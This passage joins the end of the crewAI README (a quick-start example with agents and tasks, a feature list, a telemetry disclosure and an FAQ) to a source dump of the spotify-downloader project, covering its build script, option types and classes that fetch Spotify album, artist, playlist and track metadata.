os.environ["OPENAI_API_BASE"] = 'http://localhost:11434/v1' # os.environ["OPENAI_MODEL_NAME"] ='openhermes' # Adjust based on available model # os.environ["OPENAI_API_KEY"] ='sk-111111111111111111111111111111111111111111111111' # You can pass an optional llm attribute specifying what model you wanna use. # It can be a local model through Ollama / LM Studio or a remote # model like OpenAI, Mistral, Antrophic or others (https://docs.crewai.com/how-to/LLM-Connections/) # If you don't specify a model, the default is OpenAI gpt-4o # # import os # os.environ['OPENAI_MODEL_NAME'] = 'gpt-3.5-turbo' # # OR # # from langchain_openai import ChatOpenAI search_tool = SerperDevTool() # Define your agents with roles and goals researcher = Agent( role='Senior Research Analyst', goal='Uncover cutting-edge developments in AI and data science', backstory="""You work at a leading tech think tank. Your expertise lies in identifying emerging trends. 
  You have a knack for dissecting complex data and presenting actionable insights.""",
  verbose=True,
  allow_delegation=False,
  # You can pass an optional llm attribute specifying which model you want to use.
  # llm=ChatOpenAI(model_name="gpt-3.5-turbo", temperature=0.7),
  tools=[search_tool]
)
writer = Agent(
  role='Tech Content Strategist',
  goal='Craft compelling content on tech advancements',
  backstory="""You are a renowned Content Strategist, known for your insightful and engaging articles.
  You transform complex concepts into compelling narratives.""",
  verbose=True,
  allow_delegation=True
)

# Create tasks for your agents
task1 = Task(
  description="""Conduct a comprehensive analysis of the latest advancements in AI in 2024.
  Identify key trends, breakthrough technologies, and potential industry impacts.""",
  expected_output="Full analysis report in bullet points",
  agent=researcher
)

task2 = Task(
  description="""Using the insights provided, develop an engaging blog
  post that highlights the most significant AI advancements.
  Your post should be informative yet accessible, catering to a tech-savvy audience.
  Make it sound cool, avoid complex words so it doesn't sound like AI.""",
  expected_output="Full blog post of at least 4 paragraphs",
  agent=writer
)

# Instantiate your crew with a sequential process
crew = Crew(
  agents=[researcher, writer],
  tasks=[task1, task2],
  verbose=True,
  process=Process.sequential
)

# Get your crew to work!
result = crew.kickoff()

print("######################")
print(result)
```

In addition to the sequential process, you can use the hierarchical process, which automatically assigns a manager to the defined crew to properly coordinate the planning and execution of tasks through delegation and validation of results (a minimal sketch follows the feature list below). [See more about the processes here](https://docs.crewai.com/core-concepts/Processes/).

## Key Features

- **Role-Based Agent Design**: Customize agents with specific roles, goals, and tools.
- **Autonomous Inter-Agent Delegation**: Agents can autonomously delegate tasks and inquire amongst themselves, enhancing problem-solving efficiency.
- **Flexible Task Management**: Define tasks with customizable tools and assign them to agents dynamically.
- **Processes Driven**: Currently supports `sequential` and `hierarchical` task execution; more complex processes such as consensual and autonomous ones are being worked on.
- **Save output as file**: Save the output of individual tasks as a file, so you can use it later.
- **Parse output as Pydantic or JSON**: Parse the output of individual tasks as a Pydantic model or as JSON if you want to.
- **Works with Open Source Models**: Run your crew using OpenAI or open-source models. Refer to the [Connect crewAI to LLMs](https://docs.crewai.com/how-to/LLM-Connections/) page for details on configuring your agents' connections to models, even ones running locally!
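As a rough illustration of the hierarchical process mentioned above (a sketch only, not part of the quick-start snippet; it reuses the agents and tasks defined there and assumes the `manager_llm` argument described in the processes documentation):

```python
from crewai import Crew, Process
from langchain_openai import ChatOpenAI

# In the hierarchical process, crewAI adds a manager that plans the work,
# delegates tasks to the agents, and validates their results.
hierarchical_crew = Crew(
    agents=[researcher, writer],   # defined in the quick-start snippet above
    tasks=[task1, task2],
    process=Process.hierarchical,
    manager_llm=ChatOpenAI(model="gpt-4o"),  # LLM that drives the auto-assigned manager
)

result = hierarchical_crew.kickoff()
print(result)
```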
![CrewAI Mind Map](./docs/crewAI-mindmap.png "CrewAI Mind Map")

## Examples

You can test different real-life examples of AI crews in the [crewAI-examples repo](https://github.com/crewAIInc/crewAI-examples?tab=readme-ov-file):

- [Landing Page Generator](https://github.com/crewAIInc/crewAI-examples/tree/main/landing_page_generator)
- [Having Human input on the execution](https://docs.crewai.com/how-to/Human-Input-on-Execution)
- [Trip Planner](https://github.com/crewAIInc/crewAI-examples/tree/main/trip_planner)
- [Stock Analysis](https://github.com/crewAIInc/crewAI-examples/tree/main/stock_analysis)

### Quick Tutorial

[![CrewAI Tutorial](https://img.youtube.com/vi/tnejrr-0a94/maxresdefault.jpg)](https://www.youtube.com/watch?v=tnejrr-0a94 "CrewAI Tutorial")

### Write Job Descriptions

[Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/job-posting) or watch a video below:

[![Jobs postings](https://img.youtube.com/vi/u98wEMz-9to/maxresdefault.jpg)](https://www.youtube.com/watch?v=u98wEMz-9to "Jobs postings")

### Trip Planner

[Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/trip_planner) or watch a video below:

[![Trip Planner](https://img.youtube.com/vi/xis7rWp-hjs/maxresdefault.jpg)](https://www.youtube.com/watch?v=xis7rWp-hjs "Trip Planner")

### Stock Analysis

[Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/stock_analysis) or watch a video below:

[![Stock Analysis](https://img.youtube.com/vi/e0Uj4yWdaAg/maxresdefault.jpg)](https://www.youtube.com/watch?v=e0Uj4yWdaAg "Stock Analysis")

## Connecting Your Crew to a Model

crewAI supports using various LLMs through a variety of connection options. By default, your agents will use the OpenAI API when querying the model. However, there are several other ways to allow your agents to connect to models. For example, you can configure your agents to use a local model via the Ollama tool.

Please refer to the [Connect crewAI to LLMs](https://docs.crewai.com/how-to/LLM-Connections/) page for details on configuring your agents' connections to models.

## How CrewAI Compares

**CrewAI's Advantage**: CrewAI is built with production in mind. It offers the flexibility of Autogen's conversational agents and the structured process approach of ChatDev, but without the rigidity. CrewAI's processes are designed to be dynamic and adaptable, fitting seamlessly into both development and production workflows.

- **Autogen**: While Autogen excels at creating conversational agents capable of working together, it lacks an inherent concept of process. In Autogen, orchestrating agents' interactions requires additional programming, which can become complex and cumbersome as the scale of tasks grows.

- **ChatDev**: ChatDev introduced the idea of processes into the realm of AI agents, but its implementation is quite rigid. Customizations in ChatDev are limited and not geared towards production environments, which can hinder scalability and flexibility in real-world applications.

## Contribution

CrewAI is open-source and we welcome contributions. If you're looking to contribute, please:

- Fork the repository.
- Create a new branch for your feature.
- Add your feature or improvement.
- Send a pull request.
- We appreciate your input!
### Installing Dependencies

```bash
poetry lock
poetry install
```

### Virtual Env

```bash
poetry shell
```

### Pre-commit hooks

```bash
pre-commit install
```

### Running Tests

```bash
poetry run pytest
```

### Running static type checks

```bash
poetry run mypy
```

### Packaging

```bash
poetry build
```

### Installing Locally

```bash
pip install dist/*.tar.gz
```

## Telemetry

CrewAI uses anonymous telemetry to collect usage data with the main purpose of helping us improve the library by focusing our efforts on the most used features, integrations and tools.

It's pivotal to understand that **NO data is collected** concerning prompts, task descriptions, agents' backstories or goals, usage of tools, API calls, responses, any data processed by the agents, or secrets and environment variables, except under the conditions mentioned below. When the `share_crew` feature is enabled, detailed data including task descriptions, agents' backstories or goals, and other specific attributes are collected to provide deeper insights while respecting user privacy. We don't offer a way to disable it now, but we will in the future.

Data collected includes:

- Version of crewAI - So we can understand how many users are using the latest version
- Version of Python - So we can decide on what versions to better support
- General OS (e.g. number of CPUs, macOS/Windows/Linux) - So we know what OS we should focus on and if we could build specific OS related features
- Number of agents and tasks in a crew - So we make sure we are testing internally with similar use cases and educate people on the best practices
- Crew Process being used - Understand where we should focus our efforts
- If Agents are using memory or allowing delegation - Understand if we improved the features or should maybe even drop them
- If Tasks are being executed in parallel or sequentially - Understand if we should focus more on parallel execution
- Language model being used - Improve support for the most used models
- Roles of agents in a crew - Understand high level use cases so we can build better tools, integrations and examples about it
- Tools names available - Understand which of the publicly available tools are being used the most so we can improve them

Users can opt in to further telemetry, sharing the complete telemetry data by setting the `share_crew` attribute to `True` on their Crews. Enabling `share_crew` results in the collection of detailed crew and task execution data, including `goal`, `backstory`, `context`, and `output` of tasks. This enables a deeper insight into usage patterns while respecting the user's choice to share.

## License

CrewAI is released under the MIT License.

## Frequently Asked Questions (FAQ)

### Q: What is CrewAI?

A: CrewAI is a cutting-edge framework for orchestrating role-playing, autonomous AI agents. It enables agents to work together seamlessly, tackling complex tasks through collaborative intelligence.

### Q: How do I install CrewAI?

A: You can install CrewAI using pip:

```shell
pip install crewai
```

For additional tools, use:

```shell
pip install 'crewai[tools]'
```

### Q: Can I use CrewAI with local models?

A: Yes, CrewAI supports various LLMs, including local models. You can configure your agents to use local models via tools like Ollama & LM Studio (see the short sketch at the end of this FAQ). Check the [LLM Connections documentation](https://docs.crewai.com/how-to/LLM-Connections/) for more details.

### Q: What are the key features of CrewAI?
A: Key features include role-based agent design, autonomous inter-agent delegation, flexible task management, process-driven execution, output saving as files, and compatibility with both open-source and proprietary models.

### Q: How does CrewAI compare to other AI orchestration tools?

A: CrewAI is designed with production in mind, offering flexibility similar to Autogen's conversational agents and structured processes like ChatDev, but with more adaptability for real-world applications.

### Q: Is CrewAI open-source?

A: Yes, CrewAI is open-source and welcomes contributions from the community.

### Q: Does CrewAI collect any data?

A: CrewAI uses anonymous telemetry to collect usage data for improvement purposes. No sensitive data (like prompts, task descriptions, or API calls) is collected. Users can opt in to share more detailed data by setting `share_crew=True` on their Crews.

### Q: Where can I find examples of CrewAI in action?

A: You can find various real-life examples in the [crewAI-examples repository](https://github.com/crewAIInc/crewAI-examples), including trip planners, stock analysis tools, and more.

### Q: How can I contribute to CrewAI?

A: Contributions are welcome! You can fork the repository, create a new branch for your feature, add your improvement, and send a pull request. Check the Contribution section in the README for more details.
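As a closing note for the local-models question above, here is a rough sketch of pointing your agents at a locally running Ollama server, based on the commented environment variables in the quick-start snippet (adjust the host, port, and model name to your own setup):

```python
import os

# Route the OpenAI-compatible client to a local Ollama endpoint
# (assumes Ollama is serving on its default port) and pick a model
# that has already been pulled locally.
os.environ["OPENAI_API_BASE"] = "http://localhost:11434/v1"
os.environ["OPENAI_MODEL_NAME"] = "openhermes"  # adjust based on available model
os.environ["OPENAI_API_KEY"] = "sk-111111111111111111111111111111111111111111111111"  # placeholder
```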
spotify-downloader
866daddc9fdc7f764b89e8278426fcbb2af6b03e
File: scripts/build.py import os import sys from pathlib import Path import PyInstaller.__main__ # type: ignore import pykakasi import yt_dlp import ytmusicapi from spotdl._version import __version__ LOCALES_PATH = str((Path(ytmusicapi.__file__).parent / "locales")) PYKAKASI_PATH = str((Path(pykakasi.__file__).parent / "data")) YTDLP_PATH = str(Path(yt_dlp.__file__).parent / "__pyinstaller") PyInstaller.__main__.run( [ "spotdl/__main__.py", "--onefile", "--add-data", f"{LOCALES_PATH}{os.pathsep}ytmusicapi/locales", "--add-data", f"{PYKAKASI_PATH}{os.pathsep}pykakasi/data", f"--additional-hooks-dir={YTDLP_PATH}", "--name", f"spotdl-{__version__}-{sys.platform}", "--console", ] ) File: scripts/docs/gen_ref_nav.py """Generate the code reference pages and navigation.""" from pathlib import Path import mkdocs_gen_files nav = mkdocs_gen_files.Nav() # type: ignore IGNORE = ( ("_version",), # ('__init__',) ) for path in Path("spotdl").glob("**/*.py"): module_path = path.relative_to("spotdl").with_suffix("") doc_path = path.relative_to("spotdl").with_suffix(".md") full_doc_path = Path("reference", doc_path) if module_path.parts in IGNORE: continue parts = tuple(module_path.parts) if parts[-1] == "__init__": if len(parts) != 1: parts = parts[:-1] doc_path = doc_path.with_name("index.md") full_doc_path = full_doc_path.with_name("index.md") elif parts[-1] == "__main__": continue nav[parts] = doc_path.as_posix() with mkdocs_gen_files.open(full_doc_path, "w") as fd: if parts == ("__init__",): fd.write("::: spotdl") continue IDENT = "spotdl." + ".".join(parts) fd.write(f"::: {IDENT}") mkdocs_gen_files.set_edit_path(full_doc_path, path) with mkdocs_gen_files.open("reference/SUMMARY.md", "w") as nav_file: nav_file.writelines(nav.build_literate_nav()) File: spotdl/_version.py """ Version module for spotdl. """ __version__ = "4.2.8" File: spotdl/__init__.py """ Init module for spotdl. This module contains the main entry point for spotdl. And Spotdl class """ import asyncio import concurrent.futures import logging from pathlib import Path from typing import List, Optional, Tuple, Union from spotdl._version import __version__ from spotdl.console import console_entry_point from spotdl.download.downloader import Downloader from spotdl.types.options import DownloaderOptionalOptions, DownloaderOptions from spotdl.types.song import Song from spotdl.utils.search import parse_query from spotdl.utils.spotify import SpotifyClient __all__ = ["Spotdl", "console_entry_point", "__version__"] logger = logging.getLogger(__name__) class Spotdl: """ Spotdl class, which simplifies the process of downloading songs from Spotify. 
```python from spotdl import Spotdl spotdl = Spotdl(client_id='your-client-id', client_secret='your-client-secret') songs = spotdl.search(['joji - test drive', 'https://open.spotify.com/track/4cOdK2wGLETKBW3PvgPWqT']) results = spotdl.download_songs(songs) song, path = spotdl.download(songs[0]) ``` """ def __init__( self, client_id: str, client_secret: str, user_auth: bool = False, cache_path: Optional[str] = None, no_cache: bool = False, headless: bool = False, downloader_settings: Optional[ Union[DownloaderOptionalOptions, DownloaderOptions] ] = None, loop: Optional[asyncio.AbstractEventLoop] = None, ): """ Initialize the Spotdl class ### Arguments - client_id: Spotify client id - client_secret: Spotify client secret - user_auth: If true, user will be prompted to authenticate - cache_path: Path to cache directory - no_cache: If true, no cache will be used - headless: If true, no browser will be opened - downloader_settings: Settings for the downloader - loop: Event loop to use """ if downloader_settings is None: downloader_settings = {} # Initialize spotify client SpotifyClient.init( client_id=client_id, client_secret=client_secret, user_auth=user_auth, cache_path=cache_path, no_cache=no_cache, headless=headless, ) # Initialize downloader self.downloader = Downloader( settings=downloader_settings, loop=loop, ) def search(self, query: List[str]) -> List[Song]: """ Search for songs. ### Arguments - query: List of search queries ### Returns - A list of Song objects ### Notes - query can be a list of song titles, urls, uris """ return parse_query( query=query, threads=self.downloader.settings["threads"], use_ytm_data=self.downloader.settings["ytm_data"], playlist_numbering=self.downloader.settings["playlist_numbering"], album_type=self.downloader.settings["album_type"], ) def get_download_urls(self, songs: List[Song]) -> List[Optional[str]]: """ Get the download urls for a list of songs. ### Arguments - songs: List of Song objects ### Returns - A list of urls if successful. ### Notes - This function is multi-threaded. """ urls: List[Optional[str]] = [] with concurrent.futures.ThreadPoolExecutor( max_workers=self.downloader.settings["threads"] ) as executor: future_to_song = { executor.submit(self.downloader.search, song): song for song in songs } for future in concurrent.futures.as_completed(future_to_song): song = future_to_song[future] try: data = future.result() urls.append(data) except Exception as exc: logger.error("%s generated an exception: %s", song, exc) return urls def download(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Download and convert song to the output format. ### Arguments - song: Song object ### Returns - A tuple containing the song and the path to the downloaded file if successful. """ return self.downloader.download_song(song) def download_songs(self, songs: List[Song]) -> List[Tuple[Song, Optional[Path]]]: """ Download and convert songs to the output format. ### Arguments - songs: List of Song objects ### Returns - A list of tuples containing the song and the path to the downloaded file if successful. """ return self.downloader.download_multiple_songs(songs) File: spotdl/__main__.py """ Main module for spotdl. Exports version and main function. """ from spotdl._version import __version__ from spotdl.console import console_entry_point if __name__ == "__main__": console_entry_point() File: spotdl/types/options.py """ This file contains types for spotdl/downloader/web modules. Options types have all the fields marked as required. 
Settings types have all the fields marked as optional. """ from typing import List, Optional, Union from typing_extensions import TypedDict __all__ = [ "SpotifyOptions", "DownloaderOptions", "WebOptions", "SpotDLOptions", "SpotifyOptionalOptions", "DownloaderOptionalOptions", "WebOptionalOptions", "SpotDLOptionalOptions", ] class SpotifyOptions(TypedDict): """ Options used for initializing the Spotify client. """ client_id: str client_secret: str auth_token: Optional[str] user_auth: bool headless: bool cache_path: str no_cache: bool max_retries: int use_cache_file: bool class DownloaderOptions(TypedDict): """ Options used for initializing the Downloader. """ audio_providers: List[str] lyrics_providers: List[str] genius_token: str playlist_numbering: bool scan_for_songs: bool m3u: Optional[str] output: str overwrite: str search_query: Optional[str] ffmpeg: str bitrate: Optional[Union[str, int]] ffmpeg_args: Optional[str] format: str save_file: Optional[str] filter_results: bool album_type: Optional[str] threads: int cookie_file: Optional[str] restrict: Optional[str] print_errors: bool sponsor_block: bool preload: bool archive: Optional[str] load_config: bool log_level: str simple_tui: bool fetch_albums: bool id3_separator: str ytm_data: bool add_unavailable: bool generate_lrc: bool force_update_metadata: bool only_verified_results: bool sync_without_deleting: bool max_filename_length: Optional[int] yt_dlp_args: Optional[str] detect_formats: Optional[List[str]] save_errors: Optional[str] ignore_albums: Optional[List[str]] proxy: Optional[str] skip_explicit: Optional[bool] log_format: Optional[str] redownload: Optional[bool] skip_album_art: Optional[bool] create_skip_file: Optional[bool] respect_skip_file: Optional[bool] sync_remove_lrc: Optional[bool] class WebOptions(TypedDict): """ Options used for initializing the Web server. """ web_use_output_dir: bool port: int host: str keep_alive: bool enable_tls: bool key_file: Optional[str] cert_file: Optional[str] ca_file: Optional[str] allowed_origins: Optional[List[str]] keep_sessions: bool force_update_gui: bool web_gui_repo: Optional[str] web_gui_location: Optional[str] class SpotDLOptions(SpotifyOptions, DownloaderOptions, WebOptions): """ Options used for initializing the SpotDL client. """ class SpotifyOptionalOptions(TypedDict, total=False): """ Options used for initializing the Spotify client. """ client_id: str client_secret: str auth_token: Optional[str] user_auth: bool headless: bool cache_path: str no_cache: bool max_retries: int use_cache_file: bool class DownloaderOptionalOptions(TypedDict, total=False): """ Options used for initializing the Downloader. 
""" audio_providers: List[str] lyrics_providers: List[str] genius_token: str playlist_numbering: bool scan_for_songs: bool m3u: Optional[str] output: str overwrite: str search_query: Optional[str] ffmpeg: str bitrate: Optional[Union[str, int]] ffmpeg_args: Optional[str] format: str save_file: Optional[str] filter_results: bool album_type: Optional[str] threads: int cookie_file: Optional[str] restrict: Optional[str] print_errors: bool sponsor_block: bool preload: bool archive: Optional[str] load_config: bool log_level: str simple_tui: bool fetch_albums: bool id3_separator: str ytm_data: bool add_unavailable: bool generate_lrc: bool force_update_metadata: bool only_verified_results: bool sync_without_deleting: bool max_filename_length: Optional[int] yt_dlp_args: Optional[str] detect_formats: Optional[List[str]] save_errors: Optional[str] proxy: Optional[str] skip_explicit: Optional[bool] log_format: Optional[str] redownload: Optional[bool] skip_album_art: Optional[bool] create_skip_file: Optional[bool] respect_skip_file: Optional[bool] sync_remove_lrc: Optional[bool] class WebOptionalOptions(TypedDict, total=False): """ Options used for initializing the Web server. """ web_use_output_dir: bool port: int host: str keep_alive: bool enable_tls: bool key_file: Optional[str] cert_file: Optional[str] ca_file: Optional[str] allowed_origins: Optional[str] keep_sessions: bool force_update_gui: bool web_gui_repo: Optional[str] web_gui_location: Optional[str] class SpotDLOptionalOptions( SpotifyOptionalOptions, DownloaderOptionalOptions, WebOptionalOptions ): """ Options used for initializing the SpotDL client. This type is modified to not require all the fields. """ File: spotdl/types/__init__.py """ Types for the spotdl package. """ File: spotdl/types/album.py """ Artist module for retrieving artist data from Spotify. """ from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Album", "AlbumError"] class AlbumError(Exception): """ Base class for all exceptions related to albums. """ @dataclass(frozen=True) class Album(SongList): """ Album class for retrieving album data from Spotify. """ artist: Dict[str, Any] @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for album. ### Arguments - url: The URL of the album. ### Returns - A dictionary with metadata. 
""" spotify_client = SpotifyClient() album_metadata = spotify_client.album(url) if album_metadata is None: raise AlbumError( "Couldn't get metadata, check if you have passed correct album id" ) metadata = { "name": album_metadata["name"], "artist": album_metadata["artists"][0], "url": url, } album_response = spotify_client.album_tracks(url) if album_response is None: raise AlbumError( "Couldn't get metadata, check if you have passed correct album id" ) tracks = album_response["items"] # Get all tracks from album while album_response["next"]: album_response = spotify_client.next(album_response) # Failed to get response, break the loop if album_response is None: break tracks.extend(album_response["items"]) if album_response is None: raise AlbumError(f"Failed to get album response: {url}") songs = [] for track in tracks: if not isinstance(track, dict) or track.get("is_local"): continue release_date = album_metadata["release_date"] artists = artists = [artist["name"] for artist in track["artists"]] song = Song.from_missing_data( name=track["name"], artists=artists, artist=artists[0], album_id=album_metadata["id"], album_name=album_metadata["name"], album_artist=album_metadata["artists"][0]["name"], album_type=album_metadata["album_type"], disc_number=track["disc_number"], disc_count=int(album_metadata["tracks"]["items"][-1]["disc_number"]), duration=int(track["duration_ms"] / 1000), year=release_date[:4], date=release_date, track_number=track["track_number"], tracks_count=album_metadata["total_tracks"], song_id=track["id"], explicit=track["explicit"], publisher=album_metadata["label"], url=track["external_urls"]["spotify"], cover_url=( max( album_metadata["images"], key=lambda i: i["width"] * i["height"] )["url"] if album_metadata["images"] else None ), copyright_text=( album_metadata["copyrights"][0]["text"] if album_metadata["copyrights"] else None ), ) songs.append(song) return metadata, songs File: spotdl/types/artist.py """ Artist module for retrieving artist data from Spotify. """ from dataclasses import dataclass from typing import Any, Dict, List, Set, Tuple from spotdl.types.album import Album from spotdl.types.song import Song, SongList from spotdl.utils.formatter import slugify from spotdl.utils.spotify import SpotifyClient __all__ = ["Artist", "ArtistError"] class ArtistError(Exception): """ Base class for all exceptions related to artists. """ @dataclass(frozen=True) class Artist(SongList): """ Artist class. Contains all the information about an artist. Frozen to prevent accidental modification. """ genres: List[str] albums: List[Album] @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for artist. ### Arguments - url: The URL of the artist. ### Returns - Dict with metadata for artist. 
""" # query spotify for artist details spotify_client = SpotifyClient() # get artist info raw_artist_meta = spotify_client.artist(url) if raw_artist_meta is None: raise ArtistError( "Couldn't get metadata, check if you have passed correct artist id" ) artist_albums = spotify_client.artist_albums(url, album_type="album,single") # check if there is response if not artist_albums: raise ArtistError( "Couldn't get albums, check if you have passed correct artist id" ) # get artist albums and remove duplicates # duplicates can occur if the artist has the same album available in # different countries albums: List[str] = [] known_albums: Set[str] = set() for album in artist_albums["items"]: albums.append(album["external_urls"]["spotify"]) known_albums.add(slugify(album["name"])) # Fetch all artist albums while artist_albums and artist_albums["next"]: artist_albums = spotify_client.next(artist_albums) if artist_albums is None: break for album in artist_albums["items"]: album_name = slugify(album["name"]) if album_name not in known_albums: albums.append(album["external_urls"]["spotify"]) known_albums.add(album_name) songs = [] for album in albums: album_obj = Album.from_url(album, fetch_songs=False) songs.extend(album_obj.songs) # Very aggressive deduplication songs_list = [] songs_names = set() for song in songs: slug_name = slugify(song.name) if song.name not in songs_names: songs_list.append(song) songs_names.add(slug_name) metadata = { "name": raw_artist_meta["name"], "genres": raw_artist_meta["genres"], "url": url, "albums": albums, } return metadata, songs_list File: spotdl/types/result.py """ Result is a class that contains all the information about a result from search performed by audio provider. """ import json from dataclasses import asdict, dataclass from typing import Any, Dict, Optional, Tuple __all__ = ["Result"] @dataclass(frozen=True, eq=True) class Result: """ Result is a class that contains all the information about a result from search perfoermed by audio provider. """ # Required fields source: str # Source of the result url: str # URL of the result verified: bool # Whether the result is from a verified source or not name: str # Name of the result duration: float # Duration of the result in seconds author: str # Author of the result result_id: str # ID of the result # Search related fields isrc_search: Optional[bool] = ( None # Whether the result is from an ISRC search or not ) search_query: Optional[str] = None # The search query used to find the result # Optional fields artists: Optional[Tuple[str, ...]] = None views: Optional[int] = None explicit: Optional[bool] = None album: Optional[str] = None year: Optional[int] = None track_number: Optional[int] = None genre: Optional[str] = None lyrics: Optional[str] = None @classmethod def from_data_dump(cls, data: str) -> "Result": """ Create a Result object from a data dump. ### Arguments - data: The data dump. ### Returns - The Song object. """ # Create dict from json string data_dict = json.loads(data) # Return product object return cls(**data_dict) @classmethod def from_dict(cls, data: Dict[str, Any]) -> "Result": """ Create a Song object from a dictionary. ### Arguments - data: The dictionary. ### Returns - The Song object. """ # Return product object return cls(**data) @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song's data. ### Returns - The dictionary. """ return asdict(self) File: spotdl/types/playlist.py """ Playlist module for retrieving playlist data from Spotify. 
""" import logging from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Playlist", "PlaylistError"] logger = logging.getLogger(__name__) class PlaylistError(Exception): """ Base class for all exceptions related to playlists. """ @dataclass(frozen=True) class Playlist(SongList): """ Playlist class for retrieving playlist data from Spotify. """ description: str author_url: str author_name: str cover_url: str @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for a playlist. ### Arguments - url: The URL of the playlist. ### Returns - A dictionary with metadata. """ spotify_client = SpotifyClient() playlist = spotify_client.playlist(url) if playlist is None: raise PlaylistError("Invalid playlist URL.") metadata = { "name": playlist["name"], "url": url, "description": playlist["description"], "author_url": playlist["external_urls"]["spotify"], "author_name": playlist["owner"]["display_name"], "cover_url": ( max( playlist["images"], key=lambda i: ( 0 if i["width"] is None or i["height"] is None else i["width"] * i["height"] ), )["url"] if (playlist.get("images") is not None and len(playlist["images"]) > 0) else "" ), } playlist_response = spotify_client.playlist_items(url) if playlist_response is None: raise PlaylistError(f"Wrong playlist id: {url}") # Get all tracks from playlist tracks = playlist_response["items"] while playlist_response["next"]: playlist_response = spotify_client.next(playlist_response) # Failed to get response, break the loop if playlist_response is None: break # Add tracks to the list tracks.extend(playlist_response["items"]) songs = [] for track_no, track in enumerate(tracks): if not isinstance(track, dict) or track.get("track") is None: continue track_meta = track["track"] if track_meta.get("is_local") or track_meta.get("type") != "track": logger.warning( "Skipping track: %s local tracks and %s are not supported", track_meta.get("id"), track_meta.get("type"), ) continue track_id = track_meta.get("id") if track_id is None or track_meta.get("duration_ms") == 0: continue album_meta = track_meta.get("album", {}) release_date = album_meta.get("release_date") artists = [artist["name"] for artist in track_meta.get("artists", [])] song = Song.from_missing_data( name=track_meta["name"], artists=artists, artist=artists[0], album_id=album_meta.get("id"), album_name=album_meta.get("name"), album_artist=( album_meta.get("artists", [])[0]["name"] if album_meta.get("artists") else None ), album_type=album_meta.get("album_type"), disc_number=track_meta["disc_number"], duration=int(track_meta["duration_ms"] / 1000), year=release_date[:4] if release_date else None, date=release_date, track_number=track_meta["track_number"], tracks_count=album_meta.get("total_tracks"), song_id=track_meta["id"], explicit=track_meta["explicit"], url=track_meta["external_urls"]["spotify"], isrc=track_meta.get("external_ids", {}).get("isrc"), cover_url=( max(album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if (len(album_meta.get("images", [])) > 0) else None ), list_position=track_no + 1, ) songs.append(song) return metadata, songs File: spotdl/types/saved.py """ Saved module for handing the saved tracks from user library """ from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Saved", 
"SavedError"] class SavedError(Exception): """ Base class for all exceptions related to saved tracks. """ @dataclass(frozen=True) class Saved(SongList): """ Saved class for handling the saved tracks from user library. """ @staticmethod def get_metadata(url: str = "saved") -> Tuple[Dict[str, Any], List[Song]]: """ Returns metadata for a saved list. ### Arguments - url: Not required, but used to match the signature of the other get_metadata methods. ### Returns - metadata: A dictionary containing the metadata for the saved list. - songs: A list of Song objects. """ metadata = {"name": "Saved tracks", "url": url} spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SavedError("You must be logged in to use this function") saved_tracks_response = spotify_client.current_user_saved_tracks() if saved_tracks_response is None: raise SavedError("Couldn't get saved tracks") saved_tracks = saved_tracks_response["items"] # Fetch all saved tracks while saved_tracks_response and saved_tracks_response["next"]: response = spotify_client.next(saved_tracks_response) if response is None: break saved_tracks_response = response saved_tracks.extend(saved_tracks_response["items"]) songs = [] for track in saved_tracks: if not isinstance(track, dict) or track.get("track", {}).get("is_local"): continue track_meta = track["track"] album_meta = track_meta["album"] release_date = album_meta["release_date"] artists = artists = [artist["name"] for artist in track_meta["artists"]] song = Song.from_missing_data( name=track_meta["name"], artists=artists, artist=artists[0], album_id=album_meta["id"], album_name=album_meta["name"], album_artist=album_meta["artists"][0]["name"], album_type=album_meta["album_type"], disc_number=track_meta["disc_number"], duration=int(track_meta["duration_ms"] / 1000), year=release_date[:4], date=release_date, track_number=track_meta["track_number"], tracks_count=album_meta["total_tracks"], song_id=track_meta["id"], explicit=track_meta["explicit"], url=track_meta["external_urls"]["spotify"], isrc=track_meta.get("external_ids", {}).get("isrc"), cover_url=( max(album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if album_meta["images"] else None ), ) songs.append(song) return metadata, songs File: spotdl/types/song.py """ Song module that hold the Song and SongList classes. """ import json from dataclasses import asdict, dataclass from typing import Any, Dict, List, Optional, Tuple from rapidfuzz import fuzz from spotdl.utils.spotify import SpotifyClient __all__ = ["Song", "SongList", "SongError"] class SongError(Exception): """ Base class for all exceptions related to songs. """ class SongListError(Exception): """ Base class for all exceptions related to song lists. """ @dataclass class Song: """ Song class. Contains all the information about a song. 
""" name: str artists: List[str] artist: str genres: List[str] disc_number: int disc_count: int album_name: str album_artist: str album_type: str duration: int year: int date: str track_number: int tracks_count: int song_id: str explicit: bool publisher: str url: str isrc: Optional[str] cover_url: Optional[str] copyright_text: Optional[str] download_url: Optional[str] = None lyrics: Optional[str] = None popularity: Optional[int] = None album_id: Optional[str] = None list_name: Optional[str] = None list_url: Optional[str] = None list_position: Optional[int] = None list_length: Optional[int] = None artist_id: Optional[str] = None @classmethod def from_url(cls, url: str) -> "Song": """ Creates a Song object from a URL. ### Arguments - url: The URL of the song. ### Returns - The Song object. """ if "open.spotify.com" not in url or "track" not in url: raise SongError(f"Invalid URL: {url}") # query spotify for song, artist, album details spotify_client = SpotifyClient() # get track info raw_track_meta = spotify_client.track(url) if raw_track_meta is None: raise SongError( "Couldn't get metadata, check if you have passed correct track id" ) if raw_track_meta["duration_ms"] == 0 or raw_track_meta["name"].strip() == "": raise SongError(f"Track no longer exists: {url}") # get artist info primary_artist_id = raw_track_meta["artists"][0]["id"] raw_artist_meta: Dict[str, Any] = spotify_client.artist(primary_artist_id) # type: ignore # get album info album_id = raw_track_meta["album"]["id"] raw_album_meta: Dict[str, Any] 